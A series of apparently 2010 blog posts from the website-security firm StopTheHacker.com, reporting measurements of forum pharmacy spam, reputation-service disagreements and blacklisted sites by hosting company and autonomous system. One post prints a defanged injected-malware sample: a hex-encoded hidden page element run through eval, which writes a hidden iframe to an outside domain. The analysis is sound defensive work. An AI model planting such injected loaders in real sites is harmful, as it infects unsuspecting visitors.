Malicious hackers have, for many years, been offering services to unscrupulous individuals and companies for monetary compensation. With the growth of Email Spam advertising everything from medical supplements to cars and lottery tickets, email scrubbers and filters have taken the game up a notch by implementing ever increasing layers of complexity to cut down on such spam. In turn, hackers have started to focus on advertising spam, such as medication and fraudulent scams by compromising web-based message boards and forums.

Hackers employ two basic techniques:

• Creating large numbers of users on forums. These accounts are then used to post spam on the message boards.
• Exploiting Web Application vulnerabilities in the software used to run the forum.

Approximately two weeks ago, Lenny Zeltser, from ISC SANS, posted an informative article about online pharmacy ads popping up on message boards. In this vein we have conducted a limited experiment with about 14,000 websites which contain spam announcing online pharmacies.

The aim of the experiment:

• What percentage of websites which advertise online pharmacies are message boards and Internet forums?
• What Web Applications, e.g. CMS packages, are used on the message boards that are compromised?

We believe this will provide us with a rough estimate of how focused are hackers toward using message boards and forums on the Internet to advertise spam. From another perspective, it will provide us some idea of how vulnerable websites are if it hosts a message board or forum from being abused by hackers.

Testing methodology:

We have used Google to mine the websites which contain certain keyword patterns such as “buy zocor online”, or “buy brand kamagra online” etc. Once the links suggested by Google were mined, each of the websites was tested against Google’s Safe Browsing List to determine if they had hosted malware (according to Google). Next, an analysis was done to determine if the link(s) mined from Google pointed to a forum or message board. This was done by identifying the presence of multiple strings inside a link. For example, if a link has the keywords “topic”, “view”, “thread” or similar keywords, including characters associated with dynamic page generation, it is probably hosting a message board or forum.

The test was conducted between January 21st and January 23rd, 2010.

Popular software packages installed on compromised forums and message boards.

We present the most interesting results below:

• 47.9% of websites displaying “online pharmacy” spam are message boards and forums.
• None of the websites advertising “online pharmacy” spam were listed on Google Safe Browsing List.
• 20.28% of forums displaying “online pharmacy” spam were using Jquery.
• 15.73% of forums displaying “online pharmacy” spam were using phpBB.
• 11.54% of forums displaying “online pharmacy” spam were using WordPress.
• 10.84 % of forums displaying “online pharmacy” spam were using Mootools.

These results and other software packages, helper-scripts, tracking-code are depicted in the graph presented above.

This small experiment shows that a high percentage of websites displaying online spam campaigns are message boards or forums. This indicates that there are many unsecured software installations and older software packages still in use which are often exploited by malicious individuals to post spam. Further, it seems that most sites which were hacked are using jQuery. This supports our previous observations regarding jQuery scripts being used to push malware to unsuspecting visitors.

Read more…

Company, News, Report google, malware, online pharmacy spam, safebrowsing, spam

Recently, we told you that Dmoz.org, one of the largest user-edited directories on the Internet, is also one of the safest directories. Directories such as Dmoz.org contain links to hundreds of thousands to millions of sites. These directories are categorized by volunteers or through automated means. Many search engines, including Google, Hotbot and others, potentially use data from these directories. These directories are also used as efficient lookup services by thousands of web-surfers who want to locate sites which belong to a very specific category.

Given the important role that these directories play in the Internet, one would expect that they would make an attempt to point only to websites which are “safe.” By “safe,” we mean sites which have not been injected with malware, via code-injection attacks or other attack vectors.

We are not picking on Dmoz.org here. We were very impressed to see that none of the 2.8 million sites we profiled, were present on the Google Safe Browsing List. This could indicate that sites listed on Dmoz.org are concerned about their image, hence care about their visitors, and take appropriate precautions against malware.

To follow up on our previous article, we have further analyzed 10,000 sites, randomly chosen from the Dmoz.org corpus of nearly 2.8 million websites. Each of the 10,000 sites was tested against each of the below website reputation services.

• McAfee SiteAdvisor
• Norton Safe Web
• Google Safe Browsing
• Microsoft Bing
• Comodo Site Inspector

Note: When analyzing a domain-name or URL, for verification with the Google Safe Browsing List, we have calculated the hash of the website name to match against the list. The test was conducted between January 19th and January 21st, 2010. The list of domain names tested are presented at the end of this article.

We identify the most interesting results below:

1. McAfee SiteAdvisor marked 0.39% of domains as Unsafe, 84.23% as Safe, 15.08% as Untested and 0.3% as Potentially-Unsafe.
2. Norton Safe Web marked 0.39% of domains as Unsafe, 59.02% as Safe, 39.79% as Untested and 0.8% as Potentially-Unsafe.
3. Google Safe Browsing marked 0.02% of domains as Unsafe, 99.98% as Safe.
   Note: The presence of the hash of the domain name being tested, on the Google Safe Browsing List, is interpreted as “Unsafe” while its absence is interpreted as “Safe.”
4. Microsoft Bing marked 0.06% of domains as Unsafe, 93.2% as Safe, and 6.74% as Untested.
5. Comodo Site Inspector marked 0.08% of domains as Unsafe, 99.46% as Safe, and 0.44% as Unreachable.
   Note: We were only able to test the first 5000 URLs with Comodo Site Inspector.

McAffee SiteAdvisor and Norton SafeWeb seem to detect nearly 19 times more websites as “Unsafe to Visit” than Google, and nearly 6 times more websites as “Unsafe to Visit” than Bing. It is interesting to note that it is an order of magnitude difference in the number of websites marked as “Unsafe to Visit” by these competing services.

We would like to know how long McAfee, Norton or Bing cache results for a particular site. Google allows webmasters to request reviews when they believe the site has been disinfected, and Comodo’s service seems to be an On-Demand service. This makes an interesting place to start for a future experiment. Further, it would be interesting to see whether sites listed on Yahoo the Directory and other directories are classified by these services.
Read more…

Report, Security bing, comparison, dmoz, safebrowsing, safeweb, siteadvisor, siteinspector, website reputation

This afternoon, a post on Badwarebusters.org reminded me of a somewhat interesting piece of malicious code I have not seen for some time. Our scanners flagged it as malware.

The original post is found here , answered by redleg on Badwarebusters.org.

This malware, found embedded in “eslpod.com/website/index.php”, is displayed below. The code has been slightly modified so as not to work as intended if loaded up and run in a browser.

<h4 id="Fl" style="display:none;">%64%6f%63%75%6d%65%6e%74%2e%77%72%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%22%68%74%74%70%3a%2f%2f%74%72%61%66%2e%74%72%61%6e%73%63%6f%6e%74%69%6e%65%6e%74%61%6c%2d%73%65%72%76%69%63%65%2e%67%2f%69%6e%64%65%78%2e%70%68%70%5c%22%20%73%74%79%6c%65%3d%5c%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%5c%22%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</h4>

<script>
ar aK=docume nt.getElem entById("Fl"), A x=ev al;
aK = aK.inne rHTML;
Ax(unescape(aK));
</script>

It is interesting to see how hackers are trying out new tricks to fool scanning systems. Most code-injection attacks deliver the payload directly within the script tags. Here, the case is slightly different. The individual has attempted to disguise the malicious payload as a simple web element inside the page by using Javascript and the getElementById function. The code then proceeds to execute the malicious payload.

The payload by itself is not so interesting. It has been known to appear in different variants before this particular example.

The payload is displayed below:

document.wri te("<ifra me src=\"hxxp://traff.tr anscon tin enta l-serv ice.org/i n dex.php\" style=\"dis play:none;\"></ifr me>");

The iframe referred to here refers to the following:

<!--LiveInternet counter-->
<script t ype="text/javascript">
<!--
document.write("<a href='hxxp://www.li veinte rnet.ru/click' "+
"target=_blank><img src='hxxp://cou nter.yad ro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+"' alt='' title='LiveInternet: ïîêàçàíî ÷èñëî ïðîñìîòðîâ è"+
" ïîñåòèòåëåé çà 24 ÷àñà' "+"border='0' width='88' height='31'><\/a>")
//-->
</script>
<!--/LiveInternet-->

This snippet should be flagged by many scanning services simply because of the reputation of the sites mentioned inside it (see Malware Patrol).

Till next time, surf safe.

Report, Security code injection, iframe, malicious websites

Hackers are hitting websites hard and fast. Everyday, upwards of 6,000 new websites are compromised by malware due to code injection, FTP credential compromise, weak server security, web-application flaws and the full gamut of other security issues.

In this vein, any system used to determine whether a website is clean or infected, needs to be able to handle large numbers of sites for analysis. This ability ensures a high throughput rate when analyzing “suspect” sites.

One of our goals at StopTheHacker.com, is to target throughput rates in excess of 1,000,000 sites per day. This obviously necessitates an automated process with high reliability and accuracy (we have it). To develop such an automated process, we focus heavily on advanced Machine Learning and Artificial Intelligence techniques which can learn on the fly from compromised websites and update to catch even more bad websites. All on the fly.

In order to develop training sets for machine-learning based automated solutions, one needs to get hold of a massive dataset. We recently profiled over 2.8 million websites (2,800,560 to be exact). What dataset is this? All these profiled sites were sourced from DMOZ. Surprisingly, none of these websites are listed in the Google Safe Browsing List as of January 19, 2010.
Note: DMOZ is a user-edited directory of sites (which provided a good starting point for this experiment).

Each website is classified according to a categorization scheme described here. We used the description to download and analyze around 2.8 million sites. Each site name was entered in a program which calculated a hash of the site name and looked it up on the Google Safe Browsing List to determine if the website was on the malware list or not.

Interestingly, we did not find any of the sites on the Google Safe Browsing List. This definitely adds a feather of sorts to DMOZ Directory’s proverbial hat. I think they might just be able to claim that they are the “largest and safest human-edited directory on the web”!

Top 50 DMOZ categories (by number of websites).

A graphical representation of the top 50 categories, sorted by those having the most websites is presented, followed by a list of the top 100 categories.
Read more…

News, Report, Security dmoz, safe sites

News aggregation sites, like Digg.com, Reddit.com, Ycombinator and Yahoo Buzz play an important part in the lives of many web-surfers. It is reported that sites like Digg.com have garnered more visitors than heavyweights like Facebook [1].

I was recently asked: “What is the probability of  a site listed on popular news aggregation sites to be blacklisted?” The answer to this question is not a very simple one. We understand that benign websites are often compromised by malicious code, sometimes due to application layer vulnerabilities or server side vulnerabilities or a combination of both. Good websites can even be compromised by simple password disclosure, or worse, a blatant nonchalant attitude towards security.

My instinct tells me that any site listed on these well known news aggregation sites, if infected, will be spotted rather quickly by some visitor to the “infected” website. If the webmaster is even half interested in the reputation of their site, they will take prompt action to remove the offending code as the number of visitors providing feedback would continue to grow. Thereby, even if a site listed on a news aggregation site were to be compromised I think it would be fixed up rather quickly.

In short I think the probability of finding an “infected” site listed on these news aggregation websites would be pretty low. To prove this, at StopTheHacker.com we conducted a small test. We analyzed around 1162 unique websites which were pointed to by one of the four news aggregation websites below:

• Digg.com
• Reddit.com
• Ycombinator
• Yahoo Buzz

We found that none of the analyzed 1162 sites were listed on Google’s Safe Browsing malware hash list as of January 19, 2010. This might be an indication of the fact that good content, interesting to the masses, is hosted on sites conscious about their security and the safety of their visitors. Given the state of Internet security today, this is one of few heartening trends.
Read more…

News, Report blacklisted websites, news aggregation sites

Some of the largest web hosting companies in the United States and abroad host more than 500,000 websites individually. These web-hosting companies focus on providing a cost-effective solution for clients to develop and maintain their Internet-facing websites. To protect these websites, these web-hosting companies often use Web-Application-Filters (WAFs) and more traditional firewall-type devices along with password protected (S)FTP access.

Anyone delving into Web-Application Security issues would realize that simply throwing up a bunch of WAFs to deal with code-injection attacks is not the greatest solution. Code injection attacks are constantly evolving because they provide hackers with a great medium with which to deliver malicious code to unsuspecting Internet surfers. It is not because of the lack of effort on part of WAF developers that code injection attacks are not being nipped in the bud, instead it is because this attack vector presents such an attractive medium for hackers to further their nefarious intentions, with comparatively less effort than other more involved hacking techniques.

Bottom line, code injection attacks and signatures are constantly changing. WAFs used by many hosting companies cannot guarantee full protection against them.

Two big reasons it is difficult to protect websites:

1. You can only protect against what you know about
2. WAFs are not self-learning and self-tuning

At StopTheHacker.com, our approach is to develop systems based on Artificial Intelligence techniques which can learn from attacks and adapt using machine learning to block and identify previously unknown code-injection incidents.

In this article we try to identify how many sites from each of the top few web-hosting companies are currently blacklisted. This gives us an indication of the kind of security being employed and the effectiveness of the systems.

This test was conducted on January 19, 2010. The AS data was mined from CAIDA and was correlated with Google Safe Browsing data.

Number of sites blacklisted by hosting company:

Hosting Company Name           ASN  Sites Blacklisted

IX WebHosting                32392               4160
GoDaddy                      26496              12648
DreamHost                    26347               5636
GigeNet                      32181                647
Peer 1                       11388               2332
Lunar Pages                  15244               3754
iWeb                         32613               2161
ThePlanet/HostGator          21844              11347
Bluehost/Hostmonster         11798               6232
LiquidWeb                    32244               3113
Leaseweb                     16265               2393
Schlund (1&1)                 8560               9105
Tele2 Telecommunication GmbH  8437               8229
China Telecom                 4812               4919
Inetwork/iEurop              29629               3197
NetworkSolutions              6245                739
RackSpace                    33070                698

Clearly, whatever security mechanism are being employed by these hosting companies, they are not enough to stop hordes of their websites falling prey to code-injection attacks and other forms of malicious attacks. Perhaps owners of these large numbers of compromised websites will force web-hosting companies to take a more proactive approach to safe hosting for their clients.

Interestingly, a web-hosting company which focuses on a secure hosting experience maps to ASN 7819, which seems to host 26 malicious sites.

EDIT: On Jan 20 2010, 7:05 AM PST, we received feedback from the webhosting company which focuses on a secure webhosting experience, that the IP ranges mentioned (below)  in this article are not used by them to host websites, but are simply the ones that belong to the datacenter they employ.  We will be very interested in re-evaluating IP ranges that are used by them to present websites on the Internet.

Read more…

News, Report, Security blacklisted websites, Security, web-hosting companies

We have recently published statistics comparing various website reputation services and have received good feedback over private channels regarding our article. In this sequel we add Microsoft’s Bing, malware filter along with comparison to other website reputation services.

At StopTheHacker.com (Jaal LLC) we have conducted tests of 721 URLs, all of which have been reported as malicious by volunteers of various blacklists. We follow a similar format for presentation of results as in the last post.

Website Reputation services: agree to disagree.

Note: All 721 domains/URLs, were reported as malicious, and were collected from malware.com.br on January 14, 2010. The blue column (maximum 100) indicates the percentage of sites that the website-reputation service correctly identified as unsafe. The orange column (maximum 100) indicates the percentage of sites that the website-reputation services incorrectly identified as safe.

The aim of the test:

1. Identify the accuracy of the website reputation service
2. Identify the overlap in terms of safe/unsafe websites

We present the most interesting results in this article. First we detail the parameters of the testing procedure to provide an idea of how the test was set up.

First, 721 URLs were collected from malware.com.br (mbr) on January 14, 2010. These URLs are reported for listing by one or more of the following: individuals, organizations, agencies and software products or services.  For the purposes of this test we assume that all the URLs obtained from the “regular” list on mbr are malicious and hence deemed “unsafe” to visit.

We compare the reputation provided by each website-reputation service and observe how many websites are marked unsafe, safe, untested, maybe-unsafe/caution/potentially-unsafe, and unreachable.

Website-reputation services tested:

• McAfee SiteAdvisor
• Norton Safe Web
• Google Safe Browsing
• Microsoft Bing
• Comodo SiteInspector

Note, that when analyzing a domainname/URL, for checking with the Google safebrowsing API, we have calculated the MD5 hash of the website name to match with the malware hash list. The date that we conducted this test was: January 15, 2010. The list of domain names tested are presented below and a graph representing the statistics for the 721 sites tested is above.

We identify the most interesting results below:

1. McAfee SiteAdvisor marked 36.75% of domains as Unsafe, 27.18% as Safe, 32.32% as Untested and 3.74% as Potentially-Unsafe.
2. Norton Safe Web marked 41.75% of domains as Unsafe, 45.49% as Safe, 4.3% as Untested and 8.32% as Potentially-Unsafe.
3. Google Safe Browsing marked 5.96% of domains as Unsafe, 94.04% as Safe.
   Note: The presence of the hash of the domain name  being tested, on the google malware hash list, is interpreted as “unsafe” while the absence is interpreted as “safe.”
4. Microsoft Bing marked 0.69% of domains as Unsafe, 34.26% as Safe, and 65.05% as Untested
5. Comodo SiteInspector marked 0.19% of domains as Unsafe, 95.82% as Safe, and 4.08% as Unreachable.

This follow-up experiment also shows that the variance between website reputation services that are currently being offered by large Internet-services/security companies continues to be very large indeed.

After discussions with representatives of the companies mentioned in this article, and getting a better idea of their behind the scenes methodologies. It seems that these website reputation services will continue to “agree to disagree.” We welcome their comments.

A note on differences between website reputation services:

Some of the services scan pages and some scan parts of a site. Some scan for potential “signs” of an infection, while others scan for the “postmortem” effect of an infection, such as an exploit being launched. Furthermore, the time difference between one of the services testing a web page or site versus when another one tests the same web page can also complicate issues. At StopTheHacker.com we recognize the current limitations of website reputation services that being offered by the industry.

In conclusion, while website reputation services have come a long way, they still have an even longer path to tread in order to become something that users should trust implicitly.

News, Report, Security bing, comodo, google, mcafee, norton, safebrowsing, safeweb, siteadvisor, website reputation

Zombie IPs can be defined as Internet Addresses which participate in bot net communications. When Internet surfers visit websites contaminated with malware, the malicious code often times is successful in infecting the computer of the unsuspecting visitor. Once the malware has installed itself on the personal computer of the Internet surfer, it proceeds to receive commands from a “controller.” This controller machine in many cases a chat group (IRC) or a more sophisticated system.

At StopTheHacker.com, we have tried to investigate whether there is a correlation between zombie IP addresses (botnet communication sources) and blacklisted websites. If there is a strong correlation, then it points to a disturbing trend that servers used to host websites, are infected at two levels. The websites themselves are infected and there is some kind of botnet malware hosted on those servers as well.

The Gumblar variety of infections have targeted web sites by installing malicious binaries on end-user clients and then sniffing through for FTP credentials to inject sites with malicious code. This experiment provides a preliminary look into whether these kinds of malware are just targeting sites and are also creating botnets using the infected machines.

Experiment Setup

We have examined 178 CIDR IP address ranges obtained from SpamHaus. The entire IP address space covered 1,508,096 IP addresses. Out of these, a random sample of 1,600 IP addresses were chosen. Subsequently, we made attempts to determine the websites hosted on each IP address and check them with the Google Safebrowsing list. The experiment was conducted on January 11, 2010.

Experiment Summary

Results in brief:
• The majority of zombie IPs do not seem to host any blacklisted websites.
• Only 0.5% IPs seemed to host a website, none of which were present in the Google blacklist.

This is an indicator that zombie IPs do not usually host blacklisted websites. It seems that malware installs itself stealthily on end-clients and sniffs for ftp credentials, and does not really try to join the host machine with the botnet. This could be due to a concern that creating/joining a botnet increases the chances of the malware being detected on the host. However, given the robust and increasingly related cycle of cyber-crime that proliferates the Internet, this trend may change soon. We will be keeping a close eye on this trend, and expect to publish more results as a follow up to this initial experiment.
Read more…

News, Report, Security blacklisting, IP, sites, zombie

An Autonomous Systems or AS is a routing construct that represents a group of networks under the control of an organization (credit for edit :Max@badwarebusters.org). These form the “structure” of the Internet. These organizations can be thought of as web-hosting companies, large Internet-based companies or resellers of bandwidth and IP addresses. These are usually large organizations for whom simply getting an Internet connection and hosting a company for their website is not enough.

In recent months, the trend of benign websites being affected by code injection clearly show that attacks to inject malware into unsuspecting websites is on the rise. It is important to understand the profile of the ASes which are actually providing transit to infected websites hosted within their systems. Since each AS provides bandwidth and resources supporting the downloading of malware to computers which belong to unsuspecting visitors of a compromised website. ASes, more specifically hosting companies and other network operators (rather than ASes) should play a pivotal role in addressing compromised websites.

At StopTheHacker.com, we have conducted extensive experiments to analyze and profile over 20,000 ASes to identify which ASes are the worst offenders in terms of hosting Blacklisted websites.  We have used Google safebrowsing data, also accessible via StopBadware.org, (which sources data from Google and Sunbelt)to identify and trend which ASes are responsible for the proliferation of badware on the Internet. We have correlated AS size with data available from CAIDA to determine whether larger ASes are more at fault or not.

We present some brief results below:

1. The average percentage of blacklisted websites in
   • Top 10 ASes (according to number of sites noted by Google) is 3.5%
   • ASes with Ranks 11-23 (according to number of sites noted by Google) is 3.75%
   • ASes with Ranks 24-40 (according to number of sites noted by Google) is 5.01%
2. The AS with the highest percentage of blacklisted sites, is AS 16557 (Colo Solutions, Inc.), with close to 60% of 10,000 sites blacklisted.
3. The Top 50 ASes, which host more than 10,000 sites each and have at least 6% of websites blacklisted, host 151,000 blacklisted sites, combined.

Interesting observations:

1. AS 16557 (Colo Solutions, Inc.), is well known for popping up on blacklists related to peer-to-peer networks [Is someone tracking P2P users]. It seems that this AS, which is not really concerned about P2P traffic emanating from within its systems, traffic which is potentially used to exchange copyrighted material, is also not interested in paying attention to malware infected websites hosted within its networks.
2. AS 15169 (Google Inc.), had 590734 sites analyzed and 6046 of them were found to contain malware.
3. AS 14173 (Photobucket), had zero sites infected out of 399424 sites analyzed.
4. The Largest AS (Level 3 Communications) according to connection degree, see CAIDA’s AS listing, was hosting 571 infected sites out of 136305 sites analyzed by Google.
5. AS 7018 (AT&T), was hosting 97 infected sites out of 7947 sites analyzed by Google.
6. AS 701 (Verizon), was hosting 117 infected sites out of 7248 sites analyzed by Google.
7. AS 1239 (Sprint), was hosting 117 infected sites out of 3958 sites analyzed by Google.

Making Sense of the Results

Below we present some graphs to highlight the percentage of blacklisted websites hosted by the top few ASes. Note that all AS rankings below are based on the number of websites analyzed by Google. An AS with rank 1 hosts more websites, analyzed by Google than an AS with rank 2.

Nearly 50 ASes host at least 600 blacklisted sites each

Top 10 ASes host lage percentages of blacklisted sites

Read more…

News, Report, Security AS, google, injection, malicious websites